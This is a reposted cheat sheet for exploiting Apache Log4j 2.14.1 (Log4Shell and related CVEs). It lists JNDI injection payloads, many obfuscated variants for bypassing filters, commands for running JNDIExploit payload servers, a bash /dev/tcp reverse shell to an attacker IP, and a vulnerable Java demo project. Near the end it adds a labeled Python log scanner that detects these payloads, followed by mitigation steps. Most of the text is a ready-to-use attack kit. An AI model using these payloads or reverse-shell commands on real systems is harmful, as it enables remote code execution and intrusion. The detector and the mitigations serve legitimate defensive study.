Apache Log4j 2.14.1
CVE-2021-44228
${jndi:ldap://xxx.dnslog.cn/exp}
# Bypass
${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp}
$ nc -lvnp <Port>
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <IP>
# -l <LDAP_Port>, default 1389
# -p <HTTP_Port>, default 8080
# Trigger: the command is passed through the cmd parameter
${jndi:ldap://<IP>:<LDAP_Port>/TomcatBypass/TomcatEcho}
# Reverse shell
/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<NC_Port> 0>&1'
# bash -i >& /dev/tcp/<VPS_IP>/<Port> 0>&1 # Base64-encode this command
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<encoded_string>" -A "<VPS_IP>"
# Trigger
${jndi:rmi://<IP>:<Port>/xxxxxx}
${jndi:ldap://127.0.0.1:1389/ badClassName}
CVE-2021-45046
${jndi:ldap://127.0.0.1}
CVE-2021-45105
CVE-2021-44832: RCE via the DataSource element of the JDBCAppender
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
  <Appenders>
    <JDBC name="databaseAppender" tableName="dbo.application_log">
      <DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource" />
      <Column ...
    </JDBC>
  </Appenders>
  ...
</Configuration>
The same DataSource element with an attacker-controlled jndiName:
<DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>
${lower:test}
${upper:qwer}
${hostName} # hostname
${java:version} # Java version
${java:vm}
${java:runtime}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxxx.xx/poc}
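A defender-side check for the obfuscated variants listed above, added here as an example and not part of the original article: it resolves the lower:, upper: and ${::-x} default-value lookups the way the payloads rely on, then flags any line whose normalized form still carries a jndi: lookup. The log lines and the host attacker.example are constructed for the demo; only those three lookups are modelled.

```python
import re
# Innermost "${...}" with no nested lookup inside; resolved repeatedly until the
# text stops changing, which undoes the nesting used by the bypass payloads.
# Assumption: only lower:, upper: and ${name:-default} are modelled (the three
# lookups those payloads rely on); this is not a reimplementation of Log4j.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)  # Log4j lower-cases the prefix

def _resolve_name(name):
    """Value of a lower:/upper: lookup, or None when the lookup is not modelled."""
    prefix, sep, arg = name.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return None

def _sub(match):
    body = match.group(1)
    name, sep, default = body.partition(":-")   # "${name:-default}"
    value = _resolve_name(name)
    if value is not None:
        return value
    if sep:                  # "${::-j}": nothing resolves, so the default "j" wins
        return default
    return match.group(0)    # jndi:, env:, sys:, ... are kept for the check below

def normalize(text, max_rounds=32):
    """Collapse obfuscating lookups so the underlying jndi: lookup becomes visible."""
    for _ in range(max_rounds):
        new = _INNER.sub(_sub, text)
        if new == text:
            break
        text = new
    return text

def scan_lines(lines):
    """Return (line_no, normalized_line) for every line carrying a JNDI lookup."""
    normalized = [(no, normalize(line)) for no, line in enumerate(lines, 1)]
    return [(no, norm) for no, norm in normalized if _JNDI.search(norm)]

# Constructed access-log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /api/items HTTP/1.1" 200 "Mozilla/5.0" "1.2"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example:1389/exp}" "-"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${j${lower:n}di:l${lower:d}ap://attacker.example/exp}" "-"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.example/poc}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:${lower:jndi}}:${lower:rmi}://attacker.example/poc}" "-"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "${hostName} ${java:version}" "-"',
]
```

scan_lines(SAMPLE_LOG) flags lines 2 to 5 and ignores the harmless hostName and java:version lookups on line 6; a lookup that uses a prefix not modelled here (env:, sys:, date:) is left in place, so a detector in production should treat any unresolved lookup in request data as suspicious rather than rely on this list.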
The X-Api-Version header is vulnerable as well and is exploited the same way. This one does not return a shell, but the request is still recorded.
# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<CMD>" -A <IP>
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calculator.app" -A 127.0.0.1
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        // Allow classes to be loaded from a remote codebase; recent JDKs disable this by default
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        // Logging an attacker-controlled string is enough to trigger the JNDI lookup
        logger.error("${jndi:ldap://127.0.0.1:1389/xxx}");
    }
}
pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>org.example</groupId>
  <artifactId>log4j-rce</artifactId>
  <version>1.0-SNAPSHOT</version>
  <dependencies>
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.14.1</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.14.1</version>
    </dependency>
  </dependencies>
</project>
-Dlog4j2.formatMsgNoLookups=true
Set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true
Add log4j2.formatMsgNoLookups=true to the log4j2.component.properties file
$ zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
The formatMsgNoLookups setting only exists in Log4j 2.10 and later and was later shown to be incomplete (CVE-2021-45046, listed above); removing JndiLookup.class or upgrading log4j-core is the dependable fix.
Copyright: Naraku
Original article: https://cloud.tencent.com/developer/article/1946434
All original articles on this site are licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International license. Please credit the source and keep the original link when reposting.